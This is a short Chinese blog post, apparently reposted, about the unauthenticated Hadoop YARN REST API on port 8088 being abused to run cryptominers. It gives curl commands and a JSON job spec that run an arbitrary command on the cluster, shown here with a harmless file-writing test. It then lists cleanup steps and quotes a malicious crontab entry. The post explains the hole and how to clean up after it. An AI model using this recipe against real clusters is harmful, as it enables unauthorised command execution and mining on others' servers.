Hadoop基础之《—yarn dr.who用户漏洞被挖矿》

Posted csj50

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Hadoop基础之《—yarn dr.who用户漏洞被挖矿》相关的知识,希望对你有一定的参考价值。

一、背景
dr.who用户执行了很多application,服务器被挖矿。因为yarn的8088端口REST API没有做权限控制,允许任意用户通过API创建任务

1、创建应用

curl -v -X POST 'http://192.168.1.1:8088/ws/v1/cluster/apps/new-application'

2、构建json文件


	"am-container-spec": 
		"commands": 
			"command": "echo '111' > /var/tmp/11112222_test_11112222"

		
	,
	"application-id": "application_1675146160084_0001",
	"application-name": "test",
	"application-type": "YARN"

3、提交任务

curl -s -i -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' http://192.168.1.1:8088/ws/v1/cluster/apps --data-binary @1.json

4、查看执行情况
http://192.168.1.1:8088/cluster/app/application_1675146160084_0001

5、服务器上在/var/tmp/下就写入了11112222_test_11112222文件

二、清理挖矿

1、检查/tmp和/var/tmp目录,删除异常文件

2、检查crontab -l,删除可疑脚本

4 * * * * /root/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh > /dev/null 2>&1 &

3、删除可疑进程

参考资料:
https://paper.seebug.org/611/
https://www.cnblogs.com/wshichang/p/14948393.html

以上是关于Hadoop基础之《—yarn dr.who用户漏洞被挖矿》的主要内容,如果未能解决你的问题,请参考以下文章

挖矿程序中毒分析(有这篇够不)

Permission denied: user=dr.who, access=WRITE, inode=“/output“:root:supergroup:drwxr-xr-x

Hadoop之YARN的安装与测试

大数据hadoop之YARN原理介绍

一文带你了解大数据技术之Hadoop(Yarn)

大数据技术之Hadoop(Yarn)资源调度器案例实操